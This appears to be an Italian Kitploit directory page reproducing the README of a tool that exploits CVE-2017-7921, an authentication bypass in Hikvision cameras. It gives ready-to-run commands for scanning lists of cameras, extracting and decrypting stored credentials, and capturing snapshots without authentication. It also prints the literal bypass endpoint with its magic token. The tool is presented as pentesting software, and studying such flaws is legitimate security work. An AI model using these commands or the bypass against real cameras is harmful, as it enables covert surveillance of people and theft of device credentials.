Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/mverschu/cve-2017-7921
RicognizioneSicurezza IoTAttacchi alle PasswordAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniAutenticazione
GitHubmverschu/cve-2017-7921

CVE-2017-7921

HikVision Auth Bypass CVE, lo strumento è in grado di estrarre credenziali e scattare istantanee basate su magic cookie o credenziali fornite.

Vedi Repository
6 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
CVE-2017-7921 — HikVision Auth Bypass CVE, lo strumento è in grado di estrarre credenziali e scattare istantanee basate su magic cookie o credenziali fornite. | Kitploit

Strumento per elencare e acquisire istantanee da telecamere Hikvision

Strumento autonomo per elencare telecamere Hikvision da un file e acquisire un'istantanea da ciascuna utilizzando credenziali valide (autenticazione HTTP Basic o Digest) o il bypass CVE. Progettato per essere eseguito su un altro host per test.

Caratteristiche

  • Elenca telecamere da un file di testo (un host o host:port per riga).
  • Controllo (CVE) – testa ogni telecamera per il bypass CVE magico (nessuna credenziale); --save-snapshot opzionale per dispositivi vulnerabili.
  • Credenziali – estrae utente/password da ogni telecamera tramite CVE (autenticazione magica + decifratura configurazione). Richiede OpenSSL.
  • Verifica autenticazione – verifica che nome utente/password siano accettati da ogni telecamera (nessuna istantanea salvata).
  • Istantanea di tutte – recupera un'immagine per telecamera (credenziali valide, oppure --exploit per usare il bypass CVE senza credenziali).
  • Richieste concorrenti (worker configurabili).
  • Autenticazione HTTP Digest opzionale; --merge opzionale per creare un'immagine panoramica. Dipendenze: requests, Pillow (per --merge).

Requisiti

  • Python 3.8+
  • requests

Installazione

root@kitploit:~
pip install -r requirements.txt

File elenco telecamere

Crea un file di testo con una telecamera per riga. I commenti con # vengono ignorati.

root@kitploit:~
# Example cameras.txt
192.168.1.100
192.168.1.101:80
nvr.local:8080

Utilizzo

Elenca telecamere

Stampa le telecamere lette dal file (nessuna credenziale necessaria).

root@kitploit:~
python hikvision_snapshots.py cameras.txt list

Controllo di raggiungibilità opzionale (HTTP GET a ogni host):

root@kitploit:~
python hikvision_snapshots.py cameras.txt list -v

Controllo (CVE)

Testa ogni telecamera per il bypass CVE di autenticazione delle istantanee Hikvision. Nessuna credenziale richiesta.

root@kitploit:~
python hikvision_snapshots.py cameras.txt check

Salva istantanee solo per telecamere vulnerabili:

root@kitploit:~
python hikvision_snapshots.py cameras.txt check --save-snapshot -o ./vuln_snapshots

Opzioni: --timeout, --workers, -o (per --save-snapshot).

Credenziali (estrazione)

Estrae le credenziali da ogni telecamera tramite CVE (autenticazione magica per recuperare elenco utenti e file di configurazione, poi decifra la configurazione). Richiede OpenSSL sull'host. Nessuna credenziale necessaria per eseguire.

root@kitploit:~
python hikvision_snapshots.py cameras.txt credentials

Opzioni: --timeout, --workers.

Verifica autenticazione

Verifica che le tue credenziali funzionino su ogni telecamera (usa gli stessi endpoint delle istantanee; non salva immagini).

root@kitploit:~
python hikvision_snapshots.py cameras.txt auth-check -u admin -p YourPassword

Opzioni: --timeout, --workers, --digest (come per istantanea).

Istantanea di tutte le telecamere

Acquisisce una istantanea per telecamera e la salva come JPEG. Usa credenziali valide o --exploit (bypass CVE, nessuna credenziale).

root@kitploit:~
# With credentials
python hikvision_snapshots.py cameras.txt snapshot -u admin -p YourPassword

# With CVE exploit (no credentials)
python hikvision_snapshots.py cameras.txt snapshot --exploit
  • Le istantanee vengono salvate in snapshots/ per impostazione predefinita (usa -o per cambiare).
  • I nomi dei file derivano da host o host_port (ad es. 192_168_1_100.jpg, nvr_local_8080.jpg).

Opzioni:

Con --merge, dopo aver salvato ogni istantanea, lo strumento costruisce un'unica immagine a griglia (overview.jpg) nella directory di output con una cella per telecamera e un'etichetta. Richiede Pillow (pip install Pillow).

Esempio con output personalizzato e autenticazione Digest:

root@kitploit:~
python hikvision_snapshots.py cameras.txt snapshot -u admin -p secret -o ./images --digest --timeout 20

Esempio con panoramica unita:

root@kitploit:~
python hikvision_snapshots.py cameras.txt snapshot -u admin -p YourPassword --merge
# or with exploit (no creds):
python hikvision_snapshots.py cameras.txt snapshot --exploit --merge -o ./out

Endpoint

Istantanea autenticata (con credenziali): lo script prova in ordine – /ISAPI/Streaming/channels/1/picture, /ISAPI/Streaming/channels/101/picture, /onvif-http/snapshot.

CVE (check / --exploit): /onvif-http/snapshot?auth=YWRtaW46MTEK (bypass autenticazione magico, nessuna credenziale).

Esecuzione su un altro host

  1. Copia hikvision_snapshots.py, requirements.txt e il file elenco telecamere sull'host.
  2. Installa: pip install -r requirements.txt
  3. Esegui list per verificare il file; usa check per CVE, auth-check per credenziali, o snapshot (con -u/-p o --exploit).

Assicurati che l'host abbia accesso di rete a tutti gli IP e le porte delle telecamere.

Scarica lo strumento
OpzioneDescrizionePredefinito
-u, --usernameNome utente telecamerarichiesto a meno di --exploit
-p, --passwordPassword telecamerarichiesta a meno di --exploit
--exploitUsa bypass CVE magico (nessuna credenziale)disattivato
-o, --output-dirDirectory per le immagini delle istantaneesnapshots
--timeoutTimeout HTTP in secondi15
--workersNumero di richieste di istantanee concorrenti10
--digestUsa autenticazione HTTP Digest invece di Basicdisattivato
--mergeUnisci tutte le istantanee in un'unica immagine panoramicadisattivato
--merge-columnsColonne griglia per unione (predefinito: auto)auto